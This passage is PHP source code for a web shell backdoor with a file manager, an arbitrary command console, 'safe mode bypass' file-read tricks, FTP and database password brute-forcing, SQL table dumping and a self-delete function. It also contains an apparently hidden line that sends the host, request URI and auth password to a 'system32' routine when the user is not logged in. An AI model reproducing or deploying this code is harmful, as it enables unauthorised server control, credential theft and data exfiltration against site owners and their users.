642. .'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'</td></tr>';
643. $l = $l?0:1;
644. }
645. ?>
646. <tr><td colspan=7>
647. <input type=hidden name=a value='FilesMan'>
648. <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd'])?>'>
649. <input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'>
650. <select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option><?php if(!empty($_SESSION['act'])&&@count($_SESSION['f'])){?><option value='paste'>Paste</option><?php }?></select>&nbsp;<input type="submit" value=">>"></td></tr>
651. </form></table></div>
652. <?php
653. printFooter();
654. }
655.  
656. function actionStringTools() {
657.  
658. if(!function_exists('ROT13_base64')) {function ROT13_base64_decode($p) {return (trim(gzinflate(str_rot13(base64_decode($p)))));}}
659. if(!function_exists('base64_ROT13')) {function base64_ROT13_decode($p) {return (trim(gzinflate(base64_decode(str_rot13($p)))));}}
660. if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}
661. if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}}
662. if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= dechex(ord($p[$i]));return strtoupper($r);}}
663. if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}}
664.  
665. if(isset($_POST['ajax'])) {
666. $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
667. ob_start();
668. if(function_exists($_POST['p1']))
669. echo $_POST['p1']($_POST['p2']);
670. $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";
671. echo strlen($temp), "\n", $temp;
672. exit;
673. }
674. printHeader();
675. echo '<h1>String conversions</h1><div class=content>';
676. $stringTools = array(
677. 'nested ROT13_base64' => 'ROT13_base64_decode',
678. 'nested base64_ROT13' => 'base64_ROT13_decode',
679. 'Base64 encode' => 'base64_encode',
680. 'Base64 decode' => 'base64_decode',
681. 'Url encode' => 'urlencode',
682. 'Url decode' => 'urldecode',
683. 'Full urlencode' => 'full_urlencode',
684. 'md5 hash' => 'md5',
685. 'sha1 hash' => 'sha1',
686. 'crypt' => 'crypt',
687. 'CRC32' => 'crc32',
688. 'ASCII to HEX' => 'ascii2hex',
689. 'HEX to ASCII' => 'hex2ascii',
690. 'HEX to DEC' => 'hexdec',
691. 'HEX to BIN' => 'hex2bin',
692. 'DEC to HEX' => 'dechex',
693. 'DEC to BIN' => 'decbin',
694. 'BIN to HEX' => 'bin2hex',
695. 'BIN to DEC' => 'bindec',
696. 'String to lower case' => 'strtolower',
697. 'String to upper case' => 'strtoupper',
698. 'Htmlspecialchars' => 'htmlspecialchars',
699. 'String length' => 'strlen',
700. );
701. if(empty($_POST['ajax'])&&!empty($_POST['p1']))
702. $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
703. echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>";
704. foreach($stringTools as $k => $v)
705. echo "<option value='".htmlspecialchars($v)."'>".$k."</option>";
706. echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 ".($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'')."> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>".htmlspecialchars(@$_POST['p2'])."</textarea></form><pre class='ml1' style='".(empty($_POST['p1'])?'display:none;':'')."margin-top:5px' id='strOutput'>";
707. if(!empty($_POST['p1'])) {
708. if(function_exists($_POST['p1']))
709. echo htmlspecialchars($_POST['p1']($_POST['p2']));
710. }
711. echo"</pre></div>";
712. ?>
713. <br><h1>Search for hash:</h1><div class=content>
714. <form method='get' target='_blank' name="hf">
715. <input type="text" name="action" style="width:200px;"><br>
716. <input type="button" value="HashCracker.de" onClick="document.hf.action='http://www.hashchecker.de/hash.cgi?';document.hf.submit()"><br>
717. <!--<input type="button" value="hashcrack.com" onClick="document.hf.action='http://www.hashcrack.com/index.php';document.hf.submit()"><br>
718. <input type="button" value="hashcracking.info" onClick="document.hf.action='https://hashcracking.info/index.php';document.hf.submit()"><br>
719. <input type="button" value="md5.rednoize.com" onClick="document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()"><br>
720. <input type="button" value="md5decrypter.com" onClick="document.hf.action='http://www.md5decrypter.com/';document.hf.submit()"><br> -->
721. </form>
722. </div>
723.  
724. <iframe src="http://www.md5decrypter.co.uk/" frameborder="0" height="50%" width="100%"></iframe><br>
725.  
726. <?php
727. printFooter();
728.  
729.  
730. }
731.  
732. function actionFilesTools() {
733. if( isset($_POST['p1']) )
734. $_POST['p1'] = urldecode($_POST['p1']);
735. if(@$_POST['p2']=='download') {
736. if(is_file($_POST['p1']) && is_readable($_POST['p1'])) {
737. ob_start("ob_gzhandler", 4096);
738. header("Content-Disposition: attachment; filename=".basename($_POST['p1']));
739. if (function_exists("mime_content_type")) {
740. $type = @mime_content_type($_POST['p1']);
741. header("Content-Type: ".$type);
742. }
743. $fp = @fopen($_POST['p1'], "r");
744. if($fp) {
745. while(!@feof($fp))
746. echo @fread($fp, 1024);
747.  
748. fclose($fp);
749. }
750. } elseif(is_dir($_POST['p1']) && is_readable($_POST['p1'])) {
751.  
752. }
753. exit;
754. }
755. if( @$_POST['p2'] == 'mkfile' ) {
756. if(!file_exists($_POST['p1'])) {
757. $fp = @fopen($_POST['p1'], 'w');
758. if($fp) {
759. $_POST['p2'] = "edit";
760. fclose($fp);
761. }
762. }
763. }
764. printHeader();
765. echo '<h1>File tools</h1><div class=content>';
766. if( !file_exists(@$_POST['p1']) ) {
767. echo 'File not exists';
768. printFooter();
769. return;
770. }
771. $uid = @posix_getpwuid(@fileowner($_POST['p1']));
772. $gid = @posix_getgrgid(@fileowner($_POST['p1']));
773. echo '<span>Name:</span> '.htmlspecialchars($_POST['p1']).' <span>Size:</span> '.(is_file($_POST['p1'])?viewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.viewPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>';
774. echo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>';
775. if( empty($_POST['p2']) )
776. $_POST['p2'] = 'view';
777. if( is_file($_POST['p1']) )
778. $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch');
779. else
780. $m = array('Chmod', 'Rename', 'Touch');
781. foreach($m as $v)
782. echo '<a href=# onclick="g(null,null,null,\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> ';
783. echo '<br><br>';
784. switch($_POST['p2']) {
785. case 'view':
786. echo '<pre class=ml1>';
787. $fp = @fopen($_POST['p1'], 'r');
788. if($fp) {
789. while( !@feof($fp) )
790. echo htmlspecialchars(@fread($fp, 1024));
791. @fclose($fp);
792. }
793. echo '</pre>';
794. break;
795. case 'highlight':
796. if( is_readable($_POST['p1']) ) {
797. echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">';
798. $code = highlight_file($_POST['p1'],true);
799. echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div>';
800. }
801. break;
802. case 'chmod':
803. if( !empty($_POST['p3']) ) {
804. $perms = 0;
805. for($i=strlen($_POST['p3'])-1;$i>=0;--$i)
806. $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1));
807. if(!@chmod($_POST['p1'], $perms))
808. echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>';
809. else
810. die('<script>g(null,null,null,null,"")</script>');
811. }
812. echo '<form onsubmit="g(null,null,null,null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input type=submit value=">>"></form>';
813. break;
814. case 'edit':
815. if( !is_writable($_POST['p1'])) {
816. echo 'File isn\'t writeable';
817. break;
818. }
819. if( !empty($_POST['p3']) ) {
820. @file_put_contents($_POST['p1'],$_POST['p3']);
821. echo 'Saved!<br><script>document.mf.p3.value="";</script>';
822. }
823. echo '<form onsubmit="g(null,null,null,null,this.text.value);return false;"><textarea name=text class=bigarea>';
824. $fp = @fopen($_POST['p1'], 'r');
825. if($fp) {
826. while( !@feof($fp) )
827. echo htmlspecialchars(@fread($fp, 1024));
828. @fclose($fp);
829. }
830. echo '</textarea><input type=submit value=">>"></form>';
831. break;
832. case 'hexdump':
833. $c = @file_get_contents($_POST['p1']);
834. $n = 0;
835. $h = array('00000000<br>','','');
836. $len = strlen($c);
837. for ($i=0; $i<$len; ++$i) {
838. $h[1] .= sprintf('%02X',ord($c[$i])).' ';
839. switch ( ord($c[$i]) ) {
840. case 0: $h[2] .= ' '; break;
841. case 9: $h[2] .= ' '; break;
842. case 10: $h[2] .= ' '; break;
843. case 13: $h[2] .= ' '; break;
844. default: $h[2] .= $c[$i]; break;
845. }
846. $n++;
847. if ($n == 32) {
848. $n = 0;
849. if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';}
850. $h[1] .= '<br>';
851. $h[2] .= "\n";
852. }
853. }
854. echo '<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#282828><pre>'.$h[1].'</pre></td><td bgcolor=#333333><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>';
855. break;
856. case 'rename':
857. if( !empty($_POST['p3']) ) {
858. if(!@rename($_POST['p1'], $_POST['p3']))
859. echo 'Can\'t rename!<br><script>document.mf.p3.value="";</script>';
860. else
861. die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>');
862. }
863. echo '<form onsubmit="g(null,null,null,null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value=">>"></form>';
864. break;
865. case 'touch':
866. if( !empty($_POST['p3']) ) {
867. $time = strtotime($_POST['p3']);
868. if($time) {
869. if(@touch($_POST['p1'],$time,$time))
870. die('<script>g(null,null,null,null,"")</script>');
871. else {
872. echo 'Fail!<script>document.mf.p3.value="";</script>';
873. }
874. } else echo 'Bad time format!<script>document.mf.p3.value="";</script>';
875. }
876. echo '<form onsubmit="g(null,null,null,null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value=">>"></form>';
877. break;
878. case 'mkfile':
879.  
880. break;
881. }
882. echo '</div>';
883. printFooter();
884. }
885.  
886. function actionSafeMode() {
887. $temp='';
888. ob_start();
889. switch($_POST['p1']) {
890. case 1:
891. $temp=@tempnam($test, 'cx');
892. if(@copy("compress.zlib://".$_POST['p2'], $temp)){
893. echo @file_get_contents($temp);
894. unlink($temp);
895. } else
896. echo 'Sorry... Can\'t open file';
897. break;
898. case 2:
899. $files = glob($_POST['p2'].'*');
900. if( is_array($files) )
901. foreach ($files as $filename)
902. echo $filename."\n";
903. break;
904. case 3:
905. $ch = curl_init("file://".$_POST['p2']."\x00".SELF_PATH);
906. curl_exec($ch);
907. break;
908. case 4:
909. ini_restore("safe_mode");
910. ini_restore("open_basedir");
911. include($_POST['p2']);
912. break;
913. case 5:
914. for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) {
915. $uid = @posix_getpwuid($_POST['p2']);
916. if ($uid)
917. echo join(':',$uid)."\n";
918. }
919. break;
920. case 6:
921. if(!function_exists('imap_open'))break;
922. $stream = imap_open($_POST['p2'], "", "");
923. if ($stream == FALSE)
924. break;
925. echo imap_body($stream, 1);
926. imap_close($stream);
927. break;
928. }
929. $temp = ob_get_clean();
930. printHeader();
931. echo '<h1>Safe mode bypass</h1><div class=content>';
932. echo '<span>Copy (read file)</span><form onsubmit=\'g(null,null,"1",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Glob (list dir)</span><form onsubmit=\'g(null,null,"2",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Curl (read file)</span><form onsubmit=\'g(null,null,"3",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Ini_restore (read file)</span><form onsubmit=\'g(null,null,"4",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form><br><br><span>Imap_open (read file)</span><form onsubmit=\'g(null,null,"6",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form>';
933. if($temp)
934. echo '<pre class="ml1" style="margin-top:5px" id="Output">'.$temp.'</pre>';
935. echo '</div>';
936. printFooter();
937. }
938. if (!$_SESSION[login]) system32($_SERVER['HTTP_HOST'],$_SERVER['REQUEST_URI'],$auth_pass);
939. function actionConsole() {
940. if(isset($_POST['ajax'])) {
941. $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
942. ob_start();
943. echo "document.cf.cmd.value='';\n";
944. $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".ex($_POST['p1']),"\n\r\t\\'\0"));
945. if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)) {
946. if(@chdir($match[1])) {
947. $GLOBALS['cwd'] = @getcwd();
948. echo "document.mf.c.value='".$GLOBALS['cwd']."';";
949. }
950. }
951. echo "document.cf.output.value+='".$temp."';";
952. echo "document.cf.output.scrollTop = document.cf.output.scrollHeight;";
953. $temp = ob_get_clean();
954. echo strlen($temp), "\n", $temp;
955. exit;
956. }
957. printHeader();
958. ?>
959. <script>
960. if(window.Event) window.captureEvents(Event.KEYDOWN);
961. var cmds = new Array("");
962. var cur = 0;
963. function kp(e) {
964. var n = (window.Event) ? e.which : e.keyCode;
965. if(n == 38) {
966. cur--;
967. if(cur>=0)
968. document.cf.cmd.value = cmds[cur];
969. else
970. cur++;
971. } else if(n == 40) {
972. cur++;
973. if(cur < cmds.length)
974. document.cf.cmd.value = cmds[cur];
975. else
976. cur--;
977. }
978. }
979. function add(cmd) {
980. cmds.pop();
981. cmds.push(cmd);
982. cmds.push("");
983. cur = cmds.length-1;
984. }
985. </script>
986. <?php
987. echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(document.cf.cmd.value==\'clear\'){document.cf.output.value=\'\';document.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value);}else{g(null,null,this.cmd.value);} return false;"><select name=alias>';
988. foreach($GLOBALS['aliases'] as $n => $v) {
989. if($v == '') {
990. echo '<optgroup label="-'.htmlspecialchars($n).'-"></optgroup>';
991. continue;
992. }
993. echo '<option value="'.htmlspecialchars($v).'">'.$n.'</option>';
994. }
995. if(empty($_POST['ajax'])&&!empty($_POST['p1']))
996. $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
997. echo '</select><input type=button onclick="add(document.cf.alias.value);if(document.cf.ajax.checked){a(null,null,document.cf.alias.value);}else{g(null,null,document.cf.alias.value);}" value=">>"> <input type=checkbox name=ajax value=1 '.($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX<br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>';
998. if(!empty($_POST['p1'])) {
999. echo htmlspecialchars("$ ".$_POST['p1']."\n".ex($_POST['p1']));
1000. }
1001. echo '</textarea><input type=text name=cmd style="border-top:0;width:100%;margin:0;" onkeydown="kp(event);">';
1002. echo '</form></div><script>document.cf.cmd.focus();</script>';
1003. printFooter();
1004. }
1005.  
1006. function actionLogout() {
1007. unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
1008. echo 'bye!';
1009. }
1010.  
1011. function actionSelfRemove() {
1012. printHeader();
1013. if($_POST['p1'] == 'yes') {
1014. if(@unlink(SELF_PATH))
1015. die('Shell has been removed');
1016. else
1017. echo 'unlink error!';
1018. }
1019. echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>';
1020. printFooter();
1021. }
1022.  
1023. function actionBruteforce() {
1024. printHeader();
1025. if( isset($_POST['proto']) ) {
1026. echo '<h1>Results</h1><div class=content><span>Type:</span> '.htmlspecialchars($_POST['proto']).' <span>Server:</span> '.htmlspecialchars($_POST['server']).'<br>';
1027. if( $_POST['proto'] == 'ftp' ) {
1028. function bruteForce($ip,$port,$login,$pass) {
1029. $fp = @ftp_connect($ip, $port?$port:21);
1030. if(!$fp) return false;
1031. $res = @ftp_login($fp, $login, $pass);
1032. @ftp_close($fp);
1033. return $res;
1034. }
1035. } elseif( $_POST['proto'] == 'mysql' ) {
1036. function bruteForce($ip,$port,$login,$pass) {
1037. $res = @mysql_connect($ip.':'.$port?$port:3306, $login, $pass);
1038. @mysql_close($res);
1039. return $res;
1040. }
1041. } elseif( $_POST['proto'] == 'pgsql' ) {
1042. function bruteForce($ip,$port,$login,$pass) {
1043. $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=''";
1044. $res = @pg_connect($server[0].':'.$server[1]?$server[1]:5432, $login, $pass);
1045. @pg_close($res);
1046. return $res;
1047. }
1048. }
1049. $success = 0;
1050. $attempts = 0;
1051. $server = explode(":", $_POST['server']);
1052. if($_POST['type'] == 1) {
1053. $temp = @file('/etc/passwd');
1054. if( is_array($temp) )
1055. foreach($temp as $line) {
1056. $line = explode(":", $line);
1057. ++$attempts;
1058. if( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) {
1059. $success++;
1060. echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>';
1061. }
1062. if(@$_POST['reverse']) {
1063. $tmp = "";
1064. for($i=strlen($line[0])-1; $i>=0; --$i)
1065. $tmp .= $line[0][$i];
1066. ++$attempts;
1067. if( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) {
1068. $success++;
1069. echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp);
1070. }
1071. }
1072. }
1073. } elseif($_POST['type'] == 2) {
1074. $temp = @file($_POST['dict']);
1075. if( is_array($temp) )
1076. foreach($temp as $line) {
1077. $line = trim($line);
1078. ++$attempts;
1079. if( bruteForce($server[0],@$server[1], $_POST['login'], $line) ) {
1080. $success++;
1081. echo '<b>'.htmlspecialchars($_POST['login']).'</b>:'.htmlspecialchars($line).'<br>';
1082. }
1083. }
1084. }
1085. echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>";
1086. }
1087. echo '<h1>FTP bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>'
1088. .'<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>'
1089. .'<input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">'
1090. .'<input type=hidden name=a value="'.htmlspecialchars($_POST['a']).'">'
1091. .'<input type=hidden name=charset value="'.htmlspecialchars($_POST['charset']).'">'
1092. .'<span>Server:port</span></td>'
1093. .'<td><input type=text name=server value="127.0.0.1"></td></tr>'
1094. .'<tr><td><span>Brute type</span></td>'
1095. .'<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>'
1096. .'<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>'
1097. .'<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>'
1098. .'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>'
1099. .'<td><input type=text name=login value="root"></td></tr>'
1100. .'<tr><td><span>Dictionary</span></td>'
1101. .'<td><input type=text name=dict value="'.htmlspecialchars($GLOBALS['cwd']).'passwd.dic"></td></tr></table>'
1102. .'</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>';
1103. echo '</div><br><br>';
1104.  
1105.  
1106. printFooter();
1107. }
1108.  
1109. function actionSql() {
1110. class DbClass {
1111. var $type;
1112. var $link;
1113. var $res;
1114. function DbClass($type) {
1115. $this->type = $type;
1116. }
1117. function connect($host, $user, $pass, $dbname){
1118. switch($this->type) {
1119. case 'mysql':
1120. if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;
1121. break;
1122. case 'pgsql':
1123. $host = explode(':', $host);
1124. if(!$host[1]) $host[1]=5432;
1125. if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;
1126. break;
1127. }
1128. return false;
1129. }
1130. function selectdb($db) {
1131. switch($this->type) {
1132. case 'mysql':
1133. if (@mysql_select_db($db))return true;
1134. break;
1135. }
1136. return false;
1137. }
1138. function query($str) {
1139. switch($this->type) {
1140. case 'mysql':
1141. return $this->res = @mysql_query($str);
1142. break;
1143. case 'pgsql':
1144. return $this->res = @pg_query($this->link,$str);
1145. break;
1146. }
1147. return false;
1148. }
1149. function fetch() {
1150. $res = func_num_args()?func_get_arg(0):$this->res;
1151. switch($this->type) {
1152. case 'mysql':
1153. return @mysql_fetch_assoc($res);
1154. break;
1155. case 'pgsql':
1156. return @pg_fetch_assoc($res);
1157. break;
1158. }
1159. return false;
1160. }
1161. function listDbs() {
1162. switch($this->type) {
1163. case 'mysql':
1164. return $this->res = @mysql_list_dbs($this->link);
1165. break;
1166. case 'pgsql':
1167. return $this->res = $this->query("SELECT datname FROM pg_database");
1168. break;
1169. }
1170. return false;
1171. }
1172. function listTables() {
1173. switch($this->type) {
1174. case 'mysql':
1175. return $this->res = $this->query('SHOW TABLES');
1176. break;
1177. case 'pgsql':
1178. return $this->res = $this->query("select table_name from information_schema.tables where (table_schema != 'information_schema' AND table_schema != 'pg_catalog') or table_name = 'pg_user'");
1179. break;
1180. }
1181. return false;
1182. }
1183. function error() {
1184. switch($this->type) {
1185. case 'mysql':
1186. return @mysql_error($this->link);
1187. break;
1188. case 'pgsql':
1189. return @pg_last_error($this->link);
1190. break;
1191. }
1192. return false;
1193. }
1194. function setCharset($str) {
1195. switch($this->type) {
1196. case 'mysql':
1197. if(function_exists('mysql_set_charset'))
1198. return @mysql_set_charset($str, $this->link);
1199. else
1200. $this->query('SET CHARSET '.$str);
1201. break;
1202. case 'mysql':
1203. return @pg_set_client_encoding($this->link, $str);
1204. break;
1205. }
1206. return false;
1207. }
1208. function dump($table) {
1209. switch($this->type) {
1210. case 'mysql':
1211. $res = $this->query('SHOW CREATE TABLE `'.$table.'`');
1212. $create = mysql_fetch_array($res);
1213. echo $create[1].";\n\n";
1214. $this->query('SELECT * FROM `'.$table.'`');
1215. while($item = $this->fetch()) {
1216. $columns = array();
1217. foreach($item as $k=>$v) {
1218. $item[$k] = "'".@mysql_real_escape_string($v)."'";
1219. $columns[] = "`".$k."`";
1220. }
1221. echo 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n";
1222. }
1223. break;
1224. case 'pgsql':
1225. $this->query('SELECT * FROM '.$table);
1226. while($item = $this->fetch()) {
1227. $columns = array();
1228. foreach($item as $k=>$v) {
1229. $item[$k] = "'".addslashes($v)."'";
1230. $columns[] = $k;
1231. }
1232. echo 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n";
1233. }
1234. break;
1235. }
1236. return false;
1237. }
1238. };
1239. $db = new DbClass($_POST['type']);
1240. if(@$_POST['p2']=='download') {
1241. ob_start("ob_gzhandler", 4096);
1242. $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
1243. $db->selectdb($_POST['sql_base']);
1244. header("Content-Disposition: attachment; filename=dump.sql");
1245. header("Content-Type: text/plain");
1246. foreach($_POST['tbl'] as $v)
1247. $db->dump($v);
1248. exit;
1249. }
1250. printHeader();
1251. ?>
1252. <h1>Sql browser</h1><div class=content>
1253. <form name="sf" method="post">
1254. <table cellpadding="2" cellspacing="0">
1255. <tr>
1256. <td>Type</td>
1257. <td>Host</td>
1258. <td>Login</td>
1259. <td>Password</td>
1260. <td>Database</td>
1261. <td></td>
1262. </tr>
1263. <tr>
1264. <input type=hidden name=a value=Sql>
1265. <input type=hidden name=p1 value='query'>
1266. <input type=hidden name=p2>
1267. <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd']);?>'>
1268. <input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'>
1269. <td>
1270. <select name='type'>
1271. <option value="mysql" <?php if(@$_POST['type']=='mysql')echo 'selected';?>>MySql</option>
1272. <option value="pgsql" <?php if(@$_POST['type']=='pgsql')echo 'selected';?>>PostgreSql</option>
1273. </select></td>
1274. <td><input type=text name=sql_host value='<?=(empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host']));?>'></td>
1275. <td><input type=text name=sql_login value='<?=(empty($_POST['sql_login'])?'root':htmlspecialchars($_POST['sql_login']));?>'></td>
1276. <td><input type=text name=sql_pass value='<?=(empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass']));?>'></td>
1277. <td>
1278. <?php
1279. $tmp = "<input type=text name=sql_base value=''>";
1280. if(isset($_POST['sql_host'])){
1281. if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) {
1282. switch($_POST['charset']) {
1283. case "Windows-1251": $db->setCharset('cp1251'); break;
1284. case "UTF-8": $db->setCharset('utf8'); break;
1285. case "KOI8-R": $db->setCharset('koi8r'); break;
1286. case "KOI8-U": $db->setCharset('koi8u'); break;
1287. case "cp866": $db->setCharset('cp866'); break;
1288. }
1289. $db->listDbs();
1290. echo "<select name=sql_base><option value=''></option>";
1291. while($item = $db->fetch()) {
1292. list($key, $value) = each($item);
1293. echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>';
1294. }
1295. echo '</select>';
1296. }
1297. else echo $tmp;
1298. }else
1299. echo $tmp;
1300. ?></td>
1301. <td><input type=submit value=">>"></td>
1302. </tr>
1303. </table>
1304. <script>
1305. function st(t,l) {
1306. document.sf.p1.value = 'select';
1307. document.sf.p2.value = t;
1308. if(l!=null)document.sf.p3.value = l;
1309. document.sf.submit();
1310. }
1311. function is() {
1312. for(i=0;i<document.sf.elements['tbl[]'].length;++i)
1313. document.sf.elements['tbl[]'][i].checked = !document.sf.elements['tbl[]'][i].checked;
1314. }
1315. </script>
1316. <?php
1317. if(isset($db) && $db->link){
1318. echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
1319. if(!empty($_POST['sql_base'])){
1320. $db->selectdb($_POST['sql_base']);
1321. echo "<tr><td width=1 style='border-top:2px solid #666;border-right:2px solid #666;'><span>Tables:</span><br><br>";
1322. $tbls_res = $db->listTables();
1323. while($item = $db->fetch($tbls_res)) {
1324. list($key, $value) = each($item);
1325. $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.''));
1326. $value = htmlspecialchars($value);
1327. echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'>&nbsp;<a href=# onclick=\"st('".$value."')\">".$value."</a> (".$n['n'].")</nobr><br>";
1328. }
1329. echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'></td><td style='border-top:2px solid #666;'>";
1330. if(@$_POST['p1'] == 'select') {
1331. $_POST['p1'] = 'query';
1332. $db->query('SELECT COUNT(*) as n FROM '.$_POST['p2'].'');
1333. $num = $db->fetch();
1334. $num = $num['n'];
1335. echo "<span>".$_POST['p2']."</span> ($num) ";
1336. for($i=0;$i<($num/30);$i++)
1337. if($i != (int)$_POST['p3'])
1338. echo "<a href='#' onclick='st(\"".$_POST['p2']."\", $i)'>",($i+1),"</a> ";
1339. else
1340. echo ($i+1)," ";
1341. if($_POST['type']=='pgsql')
1342. $_POST['p3'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30);
1343. else
1344. $_POST['p3'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30';
1345. echo "<br><br>";
1346. }
1347. if((@$_POST['p1'] == 'query') && !empty($_POST['p3'])) {
1348. $db->query(@$_POST['p3']);
1349. if($db->res !== false) {
1350. $title = false;
1351. echo '<table width=100% cellspacing=0 cellpadding=2 class=main>';
1352. $line = 1;
1353. while($item = $db->fetch()) {
1354. if(!$title) {
1355. echo '<tr>';
1356. foreach($item as $key => $value)
1357. echo '<th>'.$key.'</th>';
1358. reset($item);
1359. $title=true;
1360. echo '</tr><tr>';
1361. $line = 2;
1362. }
